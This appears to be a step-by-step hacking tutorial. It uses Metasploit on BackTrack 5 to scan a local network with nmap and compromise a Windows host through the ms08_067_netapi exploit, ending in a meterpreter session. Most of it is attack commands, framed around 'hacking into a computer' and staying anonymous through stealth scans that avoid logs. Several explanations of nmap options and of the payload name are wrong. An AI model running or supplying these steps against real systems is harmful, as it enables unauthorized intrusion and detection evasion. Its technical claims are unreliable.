This tutorial will walk you through hacking into a computer on your network using a program called Metasploit. This program is built into BackTrack 5, so that is what I'll be using in this tutorial. You can find out where to get BackTrack 5 and how to set it up in the Hacking WiFi section of this app.
What you need:
Linux or BackTrack 5 (see Hacking WiFi section of this app for instructions)
Be on the same network as the PC target
First, we're going to create a username and password for our Metasploit database. To do this, open the command window and enter:
service postgresql start
If you're using an older version of BackTrack, the command will be /etc/init.d/postgresql-8.3 start, or if that doesn't work, change the 8.3 to 8.4.
Next, enter the following commands (if you're using BackTrack, leave out the sudo part of each command):
sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'your password';
\q
sudo passwd -d postgres
sudo su postgres -c passwd
What this does is set up a user postgres with whatever password you choose. Now, to create or connect to the PostgreSQL database in Metasploit, you need to use the following command. Once inside Metasploit, enter:
db_connect postgres:yourpassword@127.0.0.1/msf3
This will create a PostgreSQL database called msf3 if you haven't already. If you have, it will just connect to it. This is where the show really gets going. Now you have two options: you can scan your network using outside tools to find the IP addresses, or use an nmap ping scan. To use a ping scan with nmap, run nmap through the db_nmap command, because it automatically adds the hosts it finds on the network to your new PostgreSQL database.
db_nmap -Pn -v 192.168.1.1-255
Now, the -Pn argument tells nmap to run a ping scan on port 80 to decide which hosts are up and will add them to your database, while the -v option tells nmap to run in verbose mode, giving you more detailed feedback while the scan is running. After you have a list of live hosts, you can run nmap in a new mode.
db_nmap -sS -sV -sU -n -O -v 192.168.1.4
NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.
THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS.
Now, I run it against the IP 192.168.1.4 because that is what is currently on my network.
The -sS option runs a stealth SYN scan, which does not create a full TCP connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port, which will come into play when selecting an exploit to use.
The -sU option runs a UDP port scan against the target, and since there is no reply to UDP packets, they never get logged in the first place. The -O scan runs an OS scan against the target using TCP fingerprinting to tell you the operating system of the target machine; this will also come into play when selecting an exploit. The -n option tells nmap not to run a -Pn or ping scan against the target, as those get logged, and since you have already done that once, you wouldn't want to do it again.
And again, the -v option runs nmap in verbose mode, which allows you to see more of what's going on behind the scenes and helps you better understand what is happening.
Now, once you have a list of open ports, you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit.
Since port 445 is open, I will attempt to run the ms08_067_netapi exploit against the target. So, with Metasploit open, we will run:
use windows/smb/ms08_067_netapi
set payload windows/bind_tcp
set rhost 192.168.1.4
set lhost 192.168.1.3
set lport 5150
check
NOTE: Run the show options command to display what information is required for the exploit to work properly.
These commands in Metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit. The second sets Metasploit to use a bind shell over the TCP protocol.
The third sets the remote host to our target IP. The fourth sets the local host to our IP, and the fifth sets the local port to the one we want to listen on. Running the check command will tell us whether the target is vulnerable or not.
And as you can see, it is. So now we will run the exploit command:
exploit
From there meterpreter will open... and congrats... you're in! View the next tutorial in this section for the different meterpreter commands you can use to control the target.
This tutorial is for educational purposes only.